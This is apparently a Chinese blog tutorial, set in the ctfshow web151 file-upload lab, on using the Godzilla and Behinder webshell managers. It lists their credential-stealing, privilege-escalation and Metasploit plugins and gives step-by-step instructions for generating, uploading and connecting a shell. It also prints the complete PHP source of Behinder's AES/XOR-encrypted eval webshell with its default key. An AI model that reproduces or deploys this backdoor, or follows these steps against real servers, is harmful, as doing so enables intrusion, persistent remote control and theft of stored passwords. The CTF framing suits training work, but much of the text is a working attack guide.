[huayang]

实验环境均以 ctfshow— 文件上传 —web151 进行讲解

哥斯拉

下载地址：https://github.com/BeichenDream/Godzilla/releases/tag/v1.10-godzilla

官方文档

Godzilla

运行环境

1. JavaDynamicPayload -> jre5 及以上
2. CShapDynamicPayload -> .net2.0 及以上
3. PhpDynamicPayload -> php5.0 及以上

简介

Payload 以及加密器支持

哥斯拉内置了 3 种 Payload 以及 6 种加密器，6 种支持脚本后缀，20 个内置插件

1. JavaDynamicPayload
   1. JAVA_AES_BASE64
      1. jsp
      2. jspx
   2. JAVA_AES_RAW
      1. jsp
      2. jspx
2. CShapDynamicPayload
   1. CSHAP_AES_BASE64
      1. aspx
      2. asmx
      3. ashx
   2. JAVA_AES_RAW
      1. aspx
      2. asmx
      3. ashx
3. PhpDynamicPayload
   1. PHP_XOR_BASE64
      1. php
   2. PHP_XOR_RAW
      1. php

Raw or Base64 加密器区别

Raw : Raw 是将加密后的数据直接发送或者输出

Base64 : Base64 是将加密后的数据再进行 Base64 编码

插件支持

1. JavaDynamicPayload
   1. MemoryShell

   支持 哥斯拉 冰蝎 菜刀 ReGeorg 的内存shell 并且支持卸载

   2. Screen

   屏幕截图

   3. JRealCmd

   虚拟终端 可以用netcat连接

   4. JMeterpreter

   与MSF联动

   5. ServletManage

   Servlet管理 Servlet卸载

   6. JarLoader

   内存加载Jar 将Jar加载到 SystemClassLoader

   7. JZip

   ZIP压缩 ZIP解压

2. CShapDynamicPayload
   1. CZip

   ZIP压缩 ZIP解压

   2. ShellcodeLoader

   Shellcode加载 与MSF联动

   3. SafetyKatz

   Mimikatz

   4. lemon

   读取服务器 FileZilla navicat sqlyog Winscp xmangager 的配置信息以及密码

   5. CRevlCmd

   虚拟终端 可以用netcat连接

   6. BadPotato

   Windows权限提升 2012-2019

   7. ShapWeb

   读取服务器 谷歌 IE 火狐 浏览器保存的账号密码

   8. SweetPotato

   Windwos权限提升 烂土豆的C#版本 甜土豆

3. PhpDynamicPayload
   1. PMeterpreter

   与MSF联动

   2. ByPassOpenBasedir

   绕过OpenBasedir

   3. PZip

   ZIP压缩 ZIP解压

   4. P_Eval_Code

   代码执行

   5. BypassDisableFunctions

   绕过 DisableFunctions

基本用法 问题 & 解决办法

问题

打开界面

上传一句话

进行连接 目标 -> 添加

点击测试发现无法成功

解决办法

点击 管理 -> 生成

自行更改配置

我在本地生成一个 shell 文件

把这个文件改为 php 文件并上传至服务器

这下我们进行连接，上面自行更改的信息别错了

测试成功

添加然后右键点击进入

更多骚姿势：https://blog.csdn.net/qq_39997096/article/details/111168949

冰蝎

下载地址：https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6

官方文档

Behinder

“冰蝎” 动态二进制加密网站管理客户端

功能介绍原文链接：

《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799

工作原理原文链接：

《利用动态二进制加密实现新型一句话木马之 Java 篇》 https://xz.aliyun.com/t/2744

《利用动态二进制加密实现新型一句话木马之.NET 篇》 https://xz.aliyun.com/t/2758

《利用动态二进制加密实现新型一句话木马之 PHP 篇》 https://xz.aliyun.com/t/2774

运行环境

客户端：jre8+
服务端：.net 2.0+;php 5.3-7.4;java 6+

FAQ

• 直接用浏览器访问 shell 会报错？客户端附带的服务端为最简版本，没有做容错处理，所以直接浏览器访问可能会报错，但是不影响客户端正常连接。如果不介意服务端体积增加几个字节，可以自己加一些容错判断语句。
• 我可以对 shell 进行修改么？客户端附带的服务端可以进行各种变形，只要基本逻辑不变，客户端即可正常连接。
• 开了 socks 代理，但是服务器并没有开启代理端口？socks 代理的端口不是开在远程服务器上的，是开在本地的，利用 socks 客户端直接连接本地 IP 的代理端口即可，冰蝎会把本地端口的流量通过 http 隧道透传至远程服务器网络。

使用方法

冰蝎有自带的码，上传至服务器

冰蝎 ->server

<?php@error_reporting(0);session_start();    $key="2591c98b70119fe6"; //该密钥为连接密码32位md5值的前16位，默认连接密码shell	$_SESSION['k']=$key;	$post=file_get_contents("php://input");	if(!extension_loaded('openssl'))	{		$t="base64_"."decode";		$post=$t($post."");		for($i=0;$i<strlen($post);$i++) {    			 $post[$i] = $post[$i]^$key[$i+1&15];    			}	}	else	{		$post=openssl_decrypt($post, "AES128", $key);	}    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];	class C{public function __invoke($p) {eval($p."");}}    @call_user_func(new C(),$params);?>

一句话是不行的哦

执行一下命令看看是否真正成功

为什么这么说，看看下面的问题

问题

这东西很扯

在 ctfshow 环境会显示连接成功但是没有数据

而 ctfhub 就可以

ctfshow

ctfhub

所以老版的一句话只能搞搞 ctf 了

现在都是利用动态二进制加密实现新型一句话木马

自带 key 值

[/huayang]

FROM：浅浅淡淡[hellohy]